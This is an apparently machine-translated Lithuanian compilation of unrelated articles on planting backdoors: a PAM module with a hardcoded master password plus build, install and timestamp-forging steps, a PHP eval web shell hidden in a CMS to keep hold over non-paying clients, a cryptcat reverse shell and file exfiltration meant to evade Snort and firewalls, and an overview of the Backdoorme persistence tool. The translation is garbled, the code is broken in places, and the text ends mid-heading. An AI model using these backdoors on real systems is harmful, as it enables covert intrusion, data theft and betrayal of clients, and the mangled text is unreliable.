Savo tinklaraštyje apie Habr mes ne tik kalbame apie savo produkto - telefonijos "Hydra" ryšio operatoriams - kūrimą, bet ir skelbiame medžiagą apie darbą su infrastruktūra ir susijusiomis technologijomis.

Vokiečių žurnalistas ir įsilaužėlis Leifas Ryge'as parašė „Ars Technica“ apie tai, kaip dabartinis požiūris į programinės įrangos atnaujinimų organizavimą kelia rimtą informacijos praradimo pavojų. Šiam straipsniui pateikiame jūsų pagarbias mintis.

Priešistorė

Dar 2014 metais „Washington Post“ redakcinė kolegija rašė apie tai, kaip įmonės gali panaudoti „Apple“ ir „Google“ raktus, kad surastų raktą slaptą raktą, kuriuo būtų galima uždrausti prieigą prie jų produktų ir kurį išsaugotų bei perduotų žvalgybai. agentūros ne kartą su jais sulaikė laivą. sprendimas“.

Todėl „silpnos odos“ – atakos prieš odą, kuri gali būti labai svarbi – mažinimas yra esminis bet kokių naujų programinės įrangos saugumo didinimo mechanizmų pagrindas.

Yra daugybė būdų, kaip apsisaugoti ant sugedusios mašinos. Nuo banaliausių ir lengvai atpažįstamų (pridėkite save prie kūrėjų bazės) iki sulankstomų branduolio modulių, kurie nuotoliniame kompiuteryje įdiegia šliuzo apvalkalą. Tarp jų tai labai paprasta įgyvendinti ir turi slaptą metodą, apie kurį žino tik nedaugelis. Tai PAM autentifikavimo sistemos modulių, kuriuos naudoja visos dabartinės UNIX sistemos, modifikacija.

Kas yra PAM?

autentifikavimo moduliai (PAM) – API rinkinys, reikalingas autentifikavimo mechanizmams įgyvendinti įvairiose programose.

Prieš atsirandant PAM, norėdami įgyvendinti autentifikavimą, tarkime, raktų kortelės pagalba, pardavėjai turėjo įvesti savo raktų kortelių palaikymo kodą kiekviename sistemos komponente, kuris buvo atsakingas už kliento autentifikavimą. Norėdami pridėti ir iš naujo pasirinkti prisijungimo priemonę, sshd, taip pat bet kokią kitą programinę įrangą, prie kurios buvo planuojama pridėti panašių funkcijų.

Atsiradus PAM, situacija gerokai aiškėjo. Dabar, norint į sistemą įtraukti savo unikalų autentifikavimo protokolą, pakanka jį įdiegti viename PAM modulyje. Ir visos komunalinės paslaugos ir programos, kurios dirba su PAM, ją naudoja ir gali būti naudojamos vartotojo autentifikavimui.

Praktiškai tai atrodo maždaug taip: prisijungimo programa išplečiama į PAM, kuri atlieka visus reikiamus papildomų reikšmių patikrinimus modulio konfigūracijos faile ir grąžina rezultatą atgal į prisijungimo programą. Puiku, kodėl gi ne? Tačiau toks požiūris pakerta galimybes, kurias galime panaudoti norėdami įsitvirtinti sistemoje.

Varto zrobiti maži sargybiniai. Yra trys pagrindiniai PAM diegimai:

  • Linux-PAM yra pagrindinis PAM diegimas bet kurioje Linux sistemoje;
  • OpenPAM – palaikoma BSD sistemose ir macOS;
  • JPam yra „Java“ priedų PAM diegimas.

Nekreipsime dėmesio į jokį konkretų įgyvendinimą. Pagrindinės funkcijos yra tokios pačios.

*nix konsolidavimo su PAM wikis aspektai

Kaip nustatyti PAM odos programai, galite sužinoti iš Cataloza /etc/pam.d(„Linux“) arba /etc/pam.conf faile. „MacOS“ prisijungimo priemonės konfigūracijos failo pavyzdys:

auth pasirinktinai pam_krb5 .so use_kcminit

auth pasirinktinai pam_ntlm .so try_first_pass

auth pasirinktinai pam_mount .so try_first_pass

Reikalingas autentifikavimas pam_opendirectory .so try_first_pass

reikalinga paskyra pam_nologin .so

reikalinga paskyra pam_opendirectory .so

reikalingas slaptažodis pam_opendirectory .so

reikalinga sesija pam_launchd .so

reikalinga sesija pam_uwtmp .so

sesija pasirenkama pam_mount .so

Išsiaiškinkime, kaip čia veikia magija.

Konfigūracijos faile aprašomos tikrinimo taisyklės, reikalingos sėkmingam kliento autentifikavimui ir kitiems veiksmams (slaptažodžio keitimas, kliento paruošimas). Kiekvienoje konfigūracijos failo eilutėje yra viena taisyklė. Apsukimai išdėstyti iš eilės.

Iš kairės į dešinę: modulio tipas, valdymo vėliavėlė, modulio pavadinimas. Pirmiausia turime nurodyti autentifikavimo modulio tipą, šie moduliai patys yra atsakingi už autentifikavimą. Control_flag – modulio galia. Galite atspėti prasmę:

  • reikalingas (būtinas) - moduliui įjungus teigiamą signalą, trūkstama virvės dalis pašalinama ir tada tenkinama. Jei modulis pakeičia neigiamą rezultatą, jis netyčia išmetamas, o kitos patikros nebaigtos;
  • reikalingas (būtinas) - taip pat rekvizitas: jei patvirtinimas teigiamas, čekio dalis, kuri buvo prarasta, pašalinama. Dėl šio skirtumo, esant neigiamam tipui, čekio diržas ir toliau sugenda, maitinimas atstatomas;
  • pakankamai (pakankamai) – tokiu atveju tenkina klausimą, nes ankstesni patikrinimai neturėjo neigiamos įtakos. Jei modulis nurodytas neigiamai, rezultatas yra ignoruojamas ir grįžtamasis ciklas vykdomas toliau;
  • pasirinktinai (neprivaloma) – modulis vykdomas, bet rezultatas ignoruojamas.

Jau šiame etape aišku, kad atlikę nedidelius konfigūracijos failo pakeitimus, galime užtikrinti sėkmingą prisijungimą prie sistemos su bet kokiu slaptažodžiu (pakanka pažymėti visus auth modulius kaip neprivalomus). Priešingu atveju sprendimas bus priimtas tik teisėtam klientui ar administratoriui, kuris negalės sėkmingai užsiregistruoti prisijungdamas prie sistemos neteisingu slaptažodžiu.

Rašome galingą užpakalinių durų modulį

PAM leidžia mums įgalinti skirtingus autentifikavimo modelius. Todėl modulį galime sunaikinti su „žavingu“ slaptažodžiu ir užtikrinti, kad sistema priimtų ir standartinius klientų, ir mūsų valdžios slaptažodžius. Jei įvesite neteisingą slaptažodį, jums bus suteiktas visas autentifikavimo apėjimas. Blogas variantas.

Na, kodas (nepamirškite pakeisti „magic-password“ savo „žavingu“ slaptažodžiu):

#įtraukti

#įtraukti

#įtraukti

#įtraukti

#įtraukti

#įtraukti

#define MYPASSWD „stebuklingas slaptažodis“

PAM_EXTERN int pam_sm_setcred (pam_handle_t * pamh , int flags , int argc , const char * * argv ) (

grąžinti PAM_SUCCESS ;

PAM_EXTERN int pam_sm_acct_mgmt (pam_handle_t * pamh , int flags , int argc , const char * * argv ) (

grąžinti PAM_SUCCESS ;

PAM_EXTERN int pam_sm_authenticate (pam_handle_t * pamh , int flags , int argc , const char * * argv ) (

char *slaptažodis = NULL;

pam_get_authtok (pamh, PAM_AUTHTOK, (const char * *) & slaptažodis, NULL);

if (! strncmp (slaptažodis, MYPASSWD, strlen (MYPASSWD)))

grąžinti PAM_SUCCESS ;

grąža - 1;

Zbemo modulis:

$ sudo apt - gauti įdiegti libpam0g - dev gcc

$ gcc - fPIC - c pam_backdoor .c

$ ld - x -- bendrinamas - o pam_backdoor .so pam_backdoor .o

Įdėkite jį į katalogą su kitais moduliais:

$ sudo chown root : root pam_backdoor .so

$ sudo cp pam_backdoor .so / lib / x86_64 - linux - gnu / security /

Parodykite pagarbą tam, ką darote /lib/x86_64-linux-gnu/security/ Specifinis Debian/Ubuntu. „Fedora“, „Red Hat“ ir „CentOS“ moduliai yra kataloge /lib64/security/, o „Arch Linux“ – katalizėje /lib/security/.

Dabar PAM galite sukonfigūruoti tik taip, kad jūsų modulio patvirtinimo proceso pakaktų sėkmingam autentifikavimui. Pavyzdžiui, su paslaugų konfigūracija ( /etc/pam.d/su):

Kai kuriose „Linux“ sistemose autentifikavimą galima sukonfigūruoti failų grupėje: bendrasis autentifikavimas, bendras slaptažodis, bendras seansas, o tada prijungti prie konkrečių paslaugų konfigūracijos failų naudojant @include. Šiuo metu jums reikia garbinti.

Įvedus nustatymus į konfigūraciją, su modulyje nurodytu slaptažodžiu bus paleista su programa. Tą patį triuką galima padaryti naudojant prisijungimo priemonę (konsolės prisijungimą) ir sshd nuotoliniam prisijungimui.

Įrengsime galines duris originaliame modulyje

Redaguodami PAM konfigūraciją, galite pažymėti modulį pam_unix.so. Šis modulis užtikrina klientų autentifikavimą naudojant standartinę UNIX sistemų slaptažodžių duomenų bazę. /etc/passwd. Yra daug paslaugų, įskaitant su, login, sshd ir kitas programas (pavyzdžiui, SecureFTPd).

PAM skeveldros vis dar yra atvirojo kodo ir mes turime prieigą prie paties demono ir standartinių komponentų išvesties tekstų, o mes galime įterpti savo užpakalines duris tiesiai į šį modulį.

Norint atlikti reikiamus pakeitimus, atnaujinami PAM išvesties tekstai:

$ http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

$tar – xzf inux – PAM – 1.1.8.tar.gz

Failo atidarymas Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c Ir mes ieškome kitų eilučių:

Mes pasirenkame ir pakeičiame originalų modulį savo:

$. /konfigūruoti

$ pagaminti

$ sudo cp Linux - PAM - 1.1.8 / modules / pam_unix / .libs / pam_unix .so / lib / x86_64 - linux - gnu / security /

Kad administratorius nepažymėtų pakeitimo, keičiame failo sukūrimo laiką, kad išvengtume kitų modulių kūrimo laiko.

Prisimenu, straipsnyje „10 metų ir rekomendacijos sklypo statybai“ numačiau pasekmes, jei nesąžiningas klientas nuspręstų mus nesąžiningai mesti į tuos, kurie dirbo iš karto, nei kartos likimą. Sužinoję, kad nieko nemokėsime, negalėjome atidaryti savo aikštelių, o jose dar buvo likę keli vandens gabalai.

Tačiau nerimavau, kad vienoje iš aikštelių pamečiau nedidelį „atsarginį įėjimą“, todėl net negalvodamas nueisiu į kitą svetainę ir paliksiu pasaulį. O žiūrėdami į šį įrašą pamatysite paprastą failų įkėlimo į serverį formą.

Aš tai padėsiu importuodamas reikiamus scenarijus į svetainę ir paleisdamas juos svetainėje, o su jų pagalba jie apiplėšia savo žiaurius robotus. Šių durų minusas yra tik vienas – jos galėtų greitai išnykti, jei kas, žinoma, žinotų apie jų egzistavimą.

Praėjo valanda, ir tiems nesvarbu, kad iki šiandien viskas klostėsi sklandžiai, bet tai neapima to, kad tokios petražolės gali pasikartoti.

Iš principo galima naudoti seną failo siuntimo į serverį būdą, bet... Naujiena sudėtinga, nes tai padaryti galima paprasčiau.

Siūlau paprasčiausio Bekdurovo variantus ir idėjas, kad tikrai kiltų problemų. Ozas...

  1. Mes sukuriame php failą ir vadiname jį kaip licenciją.php ar panašiai.
  2. Įrašykite naują kodą

    if (isset($_POST["tekstas"]))
    eval($_POST["tekstas"]);
    ?>




  3. Failą, kur jis buvo pateiktas, įdedame į cms, pavyzdžiui, WYSIWYG redaktoriaus tinkle. Jei reikia, pakartotinai kopijuokite failą po 2–3 mėnesių (apie bet kokį gaisrą)

Axis vin, rėmas dėl netinkamumo. Aš tave gerbiu, nereikia aiškinti, kad eval funkcija formai priskiria kodą.

Visa tai yra rėmelis, kurį galima naudoti be jokios diegimo programos. Naudojant highlight_file galima bet kurį failą pakeisti slaptažodžiais, kurie neturi tiesioginės prieigos. Galite prisijungti prie duomenų bazės, ją išpirkti arba pakeisti. Taip pat galite sukurti scenarijų, kad pamatytumėte viską, kas yra serveryje, nesvarbu.

Žemiau supažindinsiu su idėjomis papildomoms durims, kurias galima pagaminti krepšeliams - paliksiu tai tau, mielas skaitytojau, kaip būtiną buities darbą. Jei valgys, mielai pažiūrėsiu, kas išėjo.

Idėjos dekoravimui :

  1. Būtų blogai, kad durys nebūtų prieinamos visiems, o joms būtų sukurtas leidimas, pavyzdžiui, avariniu būdu. redaktoriaus pastaba).
  2. Gavę leidimą, galite iš karto paruošti mygtukų seriją, kurią spustelėję galėsite pasiekti kitą scenarijų. Pavyzdžiui, eini prie savo durų, o ten yra mygtukai – gauti slaptažodžius, gauti duomenų bazę, peržiūrėti administratoriaus skydelį ir pan.
  3. Ar yra kitų idėjų?

Dienos pabaigoje

Vikoristovaty durys yra gera idėja, jei kuriate svetainę prieš apmokėjimą (jei mokate), arba jei dirbate su įmone ir norite apsidrausti. Pirmu atveju, jei sumokėta, tai dureles galima nuimti, arba nuimti, bet nemanau, kad daugiau prireiks. Ir pagal kitą scenarijų turėsite palaipsniui juos apipjaustyti.

Tai viskas siandienai. Man bus malonu išgirsti jūsų idėjas ir pasiūlymus šia tema! Iki naujų žinių

„Cryptcat“ leidžia mums bendrauti tarp dviejų sistemų ir užšifruoja ryšį tarp jų naudojant dvi žuvis – vieną iš daugelio puikių šifravimo algoritmų.

Anksčiau mes sužinojome apie vieną smulkmeną, leidžiančią sukurti ryšį tarp dviejų mašinų ir perkelti failus arba sukurti komandų apvalkalą, skirtą sistemos „iš naujo prijungti“. Nepaisant šio mažo įrankio grožio ir elegancijos, yra vienas didelis trūkumas – perdavimus tarp kompiuterių gali aptikti apsaugos įrenginiai, tokie kaip ugniasienės ir įsibrovimo aptikimo sistemos (IDS).

Ši pamoka susijusi su populiariu netcat pusbroliu cryptcat (kuri iš tikrųjų yra labai miela ir egzotiška, tačiau paprastesnė netcat).

„Twofish“ šifravimas prilygsta AES šifravimui, todėl „cryptcat“ yra praktiškai neperšaunamas. Taigi IDS negali aptikti blogos elgsenos sraute, jei jos maršrutai eina per tokius pirminius HTTP prievadus 80 ir 443.

Croc 1: Pretend Cryptcat

Krok 2: atrakinkite klausos aparatą sistemoje Windows

Klausytoją galime atidaryti bet kurioje sistemoje su panašia sintaksė kaip netcat. Mūsų versijoje atidarome garsiakalbį „Windows 7“ prievade 6996 ir sukuriame komandų apvalkalą.

cryptcat -l -p 6996 -e cmd.exe

L reiškia „atverk ausį“
-p 6996 reiškia "padėkite klausytoją į 6996 prievadą"
-e cmd.exe reiškia „paleisti komandų apvalkalą ryšiui“

Krok 3: Atidarykite Snort arba kitą IDS

Dabar paleiskite „Snort“ tipo IDS kitoje sistemoje, kuri prisijungs prie „Windows“ sistemos, kad užtikrintų, jog IDS būtų „užplombuotas“ šifravimu, todėl mūsų juodasis pagrindinis kompiuteris tokiems saugos įrenginiams būtų nematomas.


Krok 4: Prisijunkite prie „Windows“ sistemos naudodami „Cryptcat“.

Dėl „Cryptcat“ įdiegimo „BackTrack“ nėra mūsų kaltė, kad trukdome ir įdiegėme. Be to, jei jis yra /bin kataloge, jam gali būti uždrausta prieiga prie bet kurio kito katalogo.

Dabar prisijungiame prie „Windows 7 cryptcat“ sistemos iš savo „BackTrack“ sistemos ir matome, kaip galime nugalėti šifruoto ryšio užpakalines duris, kurių gali nepavykti aptikti.

kriptovaliuta 192.168.4.182.248 6996


Kaip matote, esame prisijungę prie Windows 7 sistemos ir pašalinome komandų apvalkalą iš Win 7 sistemos! Tai suteikia mums didelę šios sistemos kontrolę, bet ne visą, nes komandų apvalkalo galimybės yra ribotos.

Krok 5: paleiskite „Snort“ žurnalus ir įspėjimus

Šio tipo ataką (komandos apvalkalo perėjimą per tvorą) nesunkiai aptinka Snort ar kiti IDS, jei ryšys nėra užšifruotas. „Snort“ taisyklės nurodo sistemos administratoriui, kad cmd.exe apvalkalas turi pereiti ploną ryšio liniją ir tikriausiai pašalins jus iš komandos apvalkalo pergalingos vertės. Kai užšifruotas ryšys pasiekiamas per cryptcat, ši nuoroda gali būti nematoma.

Grįžkime ir patikrinkime „Snort“ žurnalus ir įspėjimus. Kadangi mums pasisekė naudojant sudėtingas IDS, nereikia jaudintis dėl komandos apvalkalo perkėlimo per tarpą. Galime patikrinti savo žurnalus, prisijungusius /var/snort/alerts ir pamatyti, kokius signalus gauname iš prisijungimo prie „Windows“ mašinos (turime žinoti iš anksto).

kwrite /var/snort/alerts


Kaip galite tęsti, mes pasiekėme sėkmės. Mes galėjome prisijungti prie „Windows“ sistemos nesijaudindami dėl jokios apsaugos sistemos!

Krok 6: Išsiųskite „Crypcat“ į 80 prievadą, kad išvengtumėte ugniasienės

Jei aukos sistemoje sėkmingai sukūrėme šifravimo užpakalines duris, saugos administratorius turi užtikrinti, kad įjungtas neatpažintas prievadas (6996). Tai labiau už viską turi inicijuoti saugos administratorius, kad apribotų mūsų prieigą. Be to, sistemose, kuriose yra geras sistemos administratorius ir gera užkarda, šis prievadas greičiausiai bus užblokuotas ugniasienės.

Bet kokiu atveju, kad galėtumėte naršyti internete dėl visko, turite naudoti atvirus prievadus 80 ir 443, taip pat, galbūt, 25, 53 ir 110. Nešifruoti fragmentai atrodo normaliai, bet srautas vyksta per prievadą 80, kuris Jei jis bus atidarytas iš karto, mažai tikėtina, kad bus pastebėtas nedidelis srautas.

Dabar, jei sėkmingai įveikėme cryptcat, siunčiame jį per 80 prievadą su visu kitu interneto srautu. Jei norite šifruoti, pažiūrėkime, kokie duomenys perduodami linijoje. Todėl saugos įrenginiams gali būti neįmanoma jo aptikti, kad jį užblokuotų, fragmentai visada bus atsakingi už srauto leidimą per 80 prievadą, o srautas yra užšifruotas ir IDS negalės jo „pakeisti“.

Čia mes perkeliame failą iš aukos sistemos, vadinamą topsecret.txt, į mūsų atakuojančią sistemą neaptikdami jokio saugos įrenginio. Šį kartą užuot siuntę komandos apvalkalą per tvorą, per savo šifruotą ryšį įveiksime itin slaptą failą, pavadintą topsecret.txt. Tai galime padaryti įvesdami „Windows“ komandų eilutę:

cryptcat -l -p 80< topsecret.txt

L reiškia „atverk ausį“
-p 80 reiškia "atidaryti klausytoją prie 80 prievado"
< означает "отправить файл через этого слушателя"

Backdoorme - programa, skirta automatiškai sukurti užpakalines duris

Backdoorme yra labai paprasta programa, kurią galima naudoti norint sukurti paslėptas galines duris Unix įrenginiuose. Backdoorme naudoja pažįstamą metasploit sąsają su nuostabiu išplėtimu. „Backdoorme“ remiasi aukos SSH ryšiais ir debesies duomenimis, per kuriuos jie gali perduoti ir patalpinti bet kokias užpakalines duris. Būkite malonus, vikoristas Backdoorme su atviru atskiru pastatu.

Priimta kaip svečiai


„Backdoorme“ iš karto ateina su daugybe įdiegtų užpakalinių durų, modulių ir papildomų modulių. Užpakalinės durys yra specifiniai komponentai, skirti sukurti ir sukurti būtinas užpakalines duris, pvz., netcat galines duris arba msfvenom galines duris. Modulius galima sukrauti ant bet kokių galinių durų ir modifikuoti, kad užpakalinės durys būtų sandaresnės, pritvirtintos arba uždengtos. Papildomi elementai ir susijusios operacijos, kurias galima ištrinti, kad būtų išsaugotas pastovumas.

Šiek tiek daugiau apie užpakalines duris: Norėdami pradėti backdoorme, patikrinkite, ko jums reikia.

$python dependencies.py

Paleisti „backdoorme“:

$ python master.py

Galinės durys

Norėdami aptikti užpakalines duris, tiesiog paleiskite raktinį žodį „naudoti“.

>> naudokite apvalkalą / metasploit + Naudojamas dabartinis tikslas 1. + Naudojant Metasploit galines duris... (msf) >>

Galite nustatyti prieigos prie galinių durų parinktis. Paleiskite „rodyti parinktis“ arba „pagalba“, kad peržiūrėtumėte parametrų, kuriuos galima koreguoti, sąrašą.

Kaip ir metasploit, užpakalinės durys yra suskirstytos pagal kategorijas.

  • Pagalbinis (papildomos kategorijos)
    • klavišų registratorius- Prideda prie sistemos klavišų kaupiklį ir suteikia galimybę siųsti rezultatus atgal paštu;
    • paprastashttp– Kliente įdiegia Python SimpleHTTP serverį.
    • Vartotojas– Tai varo naują koristuvachą prie slenksčio.
    • žiniatinklio– Kliente įdiegia „Apache Server“.
  • Eskalacija
    • setuid– SetUID backdoor leidžia kompiliuotame faile įdiegti setuid bitą, atsižvelgiant į tai, kad vartotojas turi root prieigą. Taigi, kai failą vėliau paleidžia vartotojas, kuris neleidžia root prieigos, failas susiejamas su root prieiga. Teoriškai šios užpakalinės durys nukreipia setuid bitą į nano, kad bet kokiu būdu prarandant root prieigą, užpuolikas galėtų vėl prisijungti prie SSH kaip neprivilegijuotas vartotojas ir vis tiek galėtų paleisti nano (arba pasirinkti dvigubą failą) kaip root . („nano /etc/shadow“). Atminkite, kad norint atidaryti šį plėtinį, užpakalinėms durims reikalinga šakninė prieiga prie pačios burbuolės.
    • apvalkalas– apvalkalo užpakalinės durys yra pageidaujamas galinių durų plėtinys, panašus į brolio SetUID plėtinį (arba konkretesnį). Jis dubliuoja pasikartojančio failo bash apvalkalą ir nustato SUID bitą. Atkreipkite dėmesį, kad šiai galinių durų plėtrai reikalinga root prieiga. Norėdami nugalėti šias užpakalines duris, kuriose SSH veikia kaip neprivilegijuotas vartotojas, tiesiog paleiskite „.bash -p“ ir turėsite root prieigą.
  • Shell (Shell kategorija)
    • bash– Wikirist naudoja paprastą bash scenarijų, kad prisijungtų prie konkretaus IP ir prievado derinio ir perduotų rezultatą į bash.
    • bash2- šiek tiek mažiau (ir patikimiau) aprašyto bash backdoor, kuris neprašo slaptažodžio kliento pusėje.
    • metasploitas– naudoja msfvenom, kad sukurtų dvigubą reverse_tcp kodą taikinyje, tada paleidžia dvigubą kodą, kad prisijungtų prie skaitiklio įvyniotuvo.
    • netcat– „vikoryst netcat“, kad perduotų standartinį įrenginio įvestį ir išvestį /bin/sh, suteikdamas koristuvache interaktyvų apvalkalą.
    • netcat_traditional- Vikoristovu netcat-tradicinis "s -e korpuso sukūrimui.
    • perl– Perl parašytas scenarijus, kuris peradresuoja rezultatą į bash ir pervadina procesą, kad atrodytų ne toks netvarkingas.
    • php– paleidžia PHP užpakalines duris, kurios nugali bash rezultatą. Jis automatiškai neįdiegs žiniatinklio serverio, o įdiegia „vikoryst“ žiniatinklio modulį.
    • šuniukas- Vikorist backdoor n1nj4sec Pupy, kuris yra žinomas

      Priimta kaip svečiai

      .
    • pitonas- vikorist yra trumpas python scenarijus, skirtas vikonanny komandoms ir priversti rezultatus grąžinti į koristuvach.
    • žiniatinklio– siunčia žiniatinklio serverį į pagrindinį kompiuterį, tada įdiegia msfvenom php reverse_tcp backdoor ir prisijungia prie pagrindinio kompiuterio. Nepaisant to, kad tai vis dar yra php backdoor, tai nėra tas pats, kas daugiau php backdoor aprašymai.
  • Prieiga (prieigos kategorija)
    • pašalinti_ssh- Pašalina ssh serverį kliente. Tikrai gerai patikrinti užpakalinių durų seansus, kad pašalintumėte visus pėdsakus.
    • ssh_key– sukuria RSA raktą ir nukopijuoja jį į tikslą, kad būtų galima prisijungti be ssh slaptažodžio.
    • ssh_port- Prideda naują prievadą ssh.
  • „Windows“ („Windows“ kategorija)
    • langai– Vikorist naudoja msfvenom, kad sukurtų langų užpakalines duris.
Moduliai

Gali tekti nuimti odines galines duris iš papildomų modulių, kurie yra suformuoti, kad užpakalinės durys būtų tvirtesnės. Norėdami pridėti modulį, tiesiog suaktyvinkite pridėjimo raktinį žodį.

(msf) >> pridėti nuodų + pridėtas nuodų modulis

Skin modulyje yra papildomų parametrų, kuriuos galima reguliuoti, o jei dar kartą paleisite "help", galėsite atsisiųsti arba įdiegti bet kokias papildomas parinktis.

Šiuo metu galimi moduliai:

  • nuodai
    • Tikslinio kompiuterio kompiliavimo dėžė – „Win“ sukompiliuoja surinktą failą, kad pasiektų sistemos paslaugų programą ir pagrindines galines duris.
    • Pavyzdžiui, jei modulis atidaro bin tuo pačiu metu kaip „ls“, jis sukompiliuos ir perduos dvigubą kodą pavadinimu „ls“, kuris paleidžiamas kaip originalus užpakalinės durys, taip pat „ls“, taip įgalindamas užpakalinės durys, kad užpakalinės durys būtų paleistos dažniau.
  • Cron
    • Prideda naujas crontab užpakalines duris, kad root naudotojas galėtų dirbti tam tikru dažniu.
  • Žiniatinklis
    • Įdiegia žiniatinklio serverį ir priglobia tinklalapį, kuris paleidžia užpakalines duris.
    • Tiesiog eikite į svetainę atidarę ausis ir atsidarys užpakalinės durys.
  • Vartotojas
    • Suteikia naujam koristuvach sprogimo.
  • Pradėti
    • Leidžia kurti galines duris su bashrc ir init failais.
  • Baltasis sąrašas
    • Pridėkite „baltąjį sąrašą“ prie IP taip, kad tik šis IP galėtų prisijungti prie galinių durų.
Vertimas: